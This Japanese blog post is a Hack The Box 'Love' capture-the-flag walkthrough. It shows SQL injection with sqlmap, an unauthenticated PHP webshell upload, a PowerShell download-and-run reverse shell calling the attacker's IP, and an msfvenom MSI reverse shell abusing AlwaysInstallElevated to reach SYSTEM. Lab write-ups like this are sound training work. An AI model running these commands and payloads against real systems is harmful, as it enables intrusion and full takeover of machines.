HTB: Love Writeup

Posted on by Tony3

Hack The Box: Loveのwriteup。

以下はnmapのスキャン結果。

└─$ nmap -Pn -A $RHOST -oG general-portscan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 08:57 EST
Nmap scan report for 10.129.48.103
Host is up (0.46s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   GenericLines, GetRequest, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, SIPOptions, SSLSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|_    Host '10.10.16.174' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=1/6%Time=677BE173%P=x86_64-pc-linux-gnu%r(
SF:NULL,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLi
SF:nes,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4B,"G\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(SSLSessionReq,4B,"G\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,4B,"G\
SF:0\0\x01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe,4B,"G\0\0\x
SF:01\xffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(LPDString,4B,"G\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchReq,4B,"G\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,4B,"G\0\0\x01\xff
SF:j\x04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect
SF:\x20to\x20this\x20MariaDB\x20server")%r(SIPOptions,4B,"G\0\0\x01\xffj\x
SF:04Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect\x2
SF:0to\x20this\x20MariaDB\x20server")%r(LANDesk-RC,4B,"G\0\0\x01\xffj\x04H
SF:ost\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect\x20to
SF:\x20this\x20MariaDB\x20server")%r(TerminalServer,4B,"G\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect\x20t
SF:o\x20this\x20MariaDB\x20server")%r(NCP,4B,"G\0\0\x01\xffj\x04Host\x20'1
SF:0\.10\.16\.174'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\
SF:x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h01m34s, deviation: 4h37m11s, median: 21m32s
| smb2-time: 
|   date: 2025-01-06T14:20:23
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-01-06T06:20:27-08:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.60 seconds

標的IPをブラウズしてみたところ、Voting Systemなるものへのログインページ (http://10.129.48.103/index.php) が表示された。

gobusterを走らせたところ、/adminというディレクトリを発見したのでアクセスしたところ、Voting Systemの管理画面へのログインページ (http://10.129.48.103/admin/index.php)が表示された。

ぱっと見、2つのログインページは同一だが、http://10.129.48.103/index.phpの方はIDを入力するのに対して、http://10.129.48.103/admin/index.phpの方はユーザー名を入力するという違いがある。

Voting Systemは投票用のPHPアプリケーションらしいが、ご覧のように複数の脆弱性が存在する。

└─$ searchsploit voting system           
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                   |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Online Voting System - Authentication Bypass                                                                                                                                     | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi)                                                                                                                          | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated)                                                                                                                 | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)                                                                                            | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting                                                                                                 | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI)                                                                                                                                 | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)                                                                                                        | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)                                                                                                                      | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI  (Unauthenticated SQL injection)                                                                                                             | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection                                                                        | php/webapps/50052.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

とりあえず、これらの脆弱性を突いてみることにした。

Time-based SQLiの脆弱性 (php/webapps/49817.txt) を突いてみたところ、MySQLのデータベース情報をダンプできた。

└─$ cat post.txt                                                            
POST /login.php HTTP/1.1
Host: 10.129.48.103
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://10.129.48.103
Connection: keep-alive
Referer: http://10.129.48.103/index.php
Cookie: PHPSESSID=nn7ov26np0u3m1gucjhjsmnavp
Upgrade-Insecure-Requests: 1

voter=admin&password=fuga&login=

## Used sqlmap to generate SQLi traffic
sqlmap -r post.txt -p voter --dump
[11:55:55] [INFO] retrieved: admin
Database: votesystem
Table: admin
[1 entry]
+----+-----------------------------+----------+--------------------------------------------------------------+----------+-----------+------------+
| id | photo                       | lastname | password                                                     | username | firstname | created_on |
+----+-----------------------------+----------+--------------------------------------------------------------+----------+-----------+------------+
| 1  | facebook-profile-image.jpeg | Devierte | $2y$10$4E3VVe2PWlTMejquTmMD6.Og9RmmFN.K5A1n99kHNdQxHePutFjsC | admin    | Neovic    | 2018-04-02 |
+----+-----------------------------+----------+--------------------------------------------------------------+----------+-----------+------------+

votesystemデータベースのadminテーブルからadminユーザーのパスワードハッシュ$2y$10$4E3VVe2PWlTMejquTmMD6.Og9RmmFN.K5A1n99kHNdQxHePutFjsCを入手できた。

こちらのパスワードハッシュをJohn The Ripperでクラックしてみたが、平文のパスワードは判明しなかった。

続いて遠隔コード実行の脆弱性 (php/webapps/49846.txt) を試してみた。

/admin/candidates_add.phpに細工したHTTPリクエストを送ると、認証無しでwebshellなどの悪意のあるファイルをアップロードできるらしい。アップロードしたファイルは/imagesからアクセスできるとのこと。

telnetで標的マシンの80番ポートにアクセスして、生のHTTPリクエストを送ることにした。

## Connect to port 80 via telnet
telnet $RHOST 80

## Send below crafted HTTP request to upload webshell
POST /admin/candidates_add.php HTTP/1.1
Host: 10.129.48.103
Content-Length: 285
Cache-Control: max-age=0
Origin: http://10.129.48.103
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.129.48.103/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="webshell.php"
Content-Type: application/octet-stream

<?php echo system($_REQUEST['cmd']); ?>

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add

以下、実行結果。

└─$ telnet $RHOST 80
Trying 10.129.48.103...
Connected to 10.129.48.103.
Escape character is '^]'.
POST /admin/candidates_add.php HTTP/1.1
Host: 10.129.48.103
Content-Length: 285
Cache-Control: max-age=0
Origin: http://10.129.48.103
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrmynB2CmGO6vwFpO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.129.48.103/admin/candidates.php
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="photo"; filename="webshell.php"
Content-Type: application/octet-stream

<?php echo system($_REQUEST['cmd']); ?>

------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add

HTTP/1.1 302 Found
Date: Tue, 07 Jan 2025 15:51:45 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Set-Cookie: PHPSESSID=26g1h9c0l0708fgnga9d0u1vr8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: candidates.php
Content-Length: 640
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Notice</b>:  Undefined index: admin in <b>C:\xampp\htdocs\omrs\admin\includes\session.php</b> on line <b>9</b><br />
<br />
<b>Notice</b>:  Undefined index: firstname in <b>C:\xampp\htdocs\omrs\admin\candidates_add.php</b> on line <b>5</b><br />
<br />
<b>Notice</b>:  Undefined index: lastname in <b>C:\xampp\htdocs\omrs\admin\candidates_add.php</b> on line <b>6</b><br />
<br />
<b>Notice</b>:  Undefined index: position in <b>C:\xampp\htdocs\omrs\admin\candidates_add.php</b> on line <b>7</b><br />
<br />
<b>Notice</b>:  Undefined index: platform in <b>C:\xampp\htdocs\omrs\admin\candidates_add.php</b> on line <b>8</b><br />
Connection closed by foreign host.

webshellがアップロードされ、dirコマンドの実行に成功した。

└─$ curl -i http://$RHOST/images/webshell.php?cmd=dir
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 15:53:51 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 630
Content-Type: text/html; charset=UTF-8

 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\xampp\htdocs\omrs\images

01/07/2025  07:51 AM    <DIR>          .
01/07/2025  07:51 AM    <DIR>          ..
05/18/2018  07:10 AM             4,240 facebook-profile-image.jpeg
04/12/2021  02:53 PM                 0 index.html.txt
01/26/2021  11:08 PM               844 index.jpeg
08/24/2017  03:00 AM            26,644 profile.jpg
01/07/2025  07:51 AM                41 webshell.php
               5 File(s)         31,769 bytes
               2 Dir(s)   4,171,530,240 bytes free
               2 Dir(s)   4,171,530,240 bytes free

その後、いくつかコマンドを実行して、一般ユーザーのフラグc:\users\Phoebe\desktop\user.txtを発見した。

└─$ curl -i "http://$RHOST/images/webshell.php?cmd=dir%20c:%5Cusers%5CPhoebe%5Cdesktop"
HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 15:56:18 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 396
Content-Type: text/html; charset=UTF-8

 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of c:\users\Phoebe\desktop

04/13/2021  02:20 AM    <DIR>          .
04/13/2021  02:20 AM    <DIR>          ..
01/07/2025  05:16 AM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,171,186,176 bytes free
               2 Dir(s)   4,171,186,176 bytes free

続いて権限昇格だが、その前に、アップロードしたwebshellがいまいち使いづらいので、ちゃんとしたリバースシェルを仕込むことにした。

以下のコマンドでwebshellを介してPowercatを仕込んだ。

curl -i "http://$RHOST/images/webshell.php?cmd=powershell.exe%20-nop%20-w%20hidden%20IEX(New-Object%20System.Net.WebClient).DownloadString('http://10.10.16.174/powercat.ps1');powercat%20-c%2010.10.16.174%20-p%2053%20-e%20cmd"

## URL decodes to:
curl -i "http://$RHOST/images/webshell.php?cmd=powershell.exe -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.174/powercat.ps1');powercat -c 10.10.16.174 -p 53 -e cmd"

これでより対話的にコマンドを実行できるようになった。

└─$ rlwrap nc -nvlp 53          
listening on [any] 53 ...
connect to [10.10.16.174] from (UNKNOWN) [10.129.48.103] 50016
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

C:\xampp\htdocs\omrs\images>hostname
hostname
Love

さて、標的マシンを列挙したところ、C:\xampp\htdocs\passwordmanager\creds.txtという怪しいファイルを発見。

PS C:\xampp\htdocs\passwordmanager> dir
dir


    Directory: C:\xampp\htdocs\passwordmanager


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         4/12/2021  12:25 PM             45 creds.txt                                                            
-a----         1/27/2021   5:32 PM           4720 index.php

このファイルにはadmin用のパスワード@LoveIsInTheAir!!!!が記載されていた。

PS C:\xampp\htdocs\passwordmanager> type creds.txt
type creds.txt
Vote Admin Creds admin: @LoveIsInTheAir!!!!

しかし、こちらのパスワードはあくまでVoting Systemの管理画面にログインするためのもので、このパスワードを使って権限昇格することはできなかった。

標的マシンにWinPEASを仕込んで実行したところ、AlwaysInstallElevatedが有効化されていることが判明した。

╔══════════╣ Checking AlwaysInstallElevated
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!

AlwaysInstallElevatedが有効化されていた場合、Windows用のインストーラーパッケージを昇格された権限でインストールできる

この設定を悪用すれば、MSIファイル形式で作成したリバースシェルを高権限で実行できると思われる。

攻撃マシンにて、リバースシェルをMSIファイル形式で作成。

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.174 LPORT=53 -a x64 --platform Windows -f msi -o myshell.msi

Python HTTPサーバーを起動して、リバースシェルの接続を待ち受け。

python3 -m http.server 80
rlwrap nc -nvlp 53

標的マシンにリバースシェルを仕込んで実行。

curl http://10.10.16.174/myshell.msi -o myshell.msi
myshell.msi

無事、シェルがシステム権限で起動した。

└─$ rlwrap nc -nvlp 53
listening on [any] 53 ...
connect to [10.10.16.174] from (UNKNOWN) [10.129.48.103] 50034
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

rootユーザーのフラグc:\users\administrator\desktop\root.txtを発見。

C:\WINDOWS\system32>dir c:\users\administrator\desktop
dir c:\users\administrator\desktop
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of c:\users\administrator\desktop

04/13/2021  02:20 AM    <DIR>          .
04/13/2021  02:20 AM    <DIR>          ..
01/09/2025  04:40 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   4,157,509,632 bytes free

IT業従事者。2018年10月末よりシンガポール在住。

Leave a Reply

Your email address will not be published. Required fields are marked *


The reCAPTCHA verification period has expired. Please reload the page.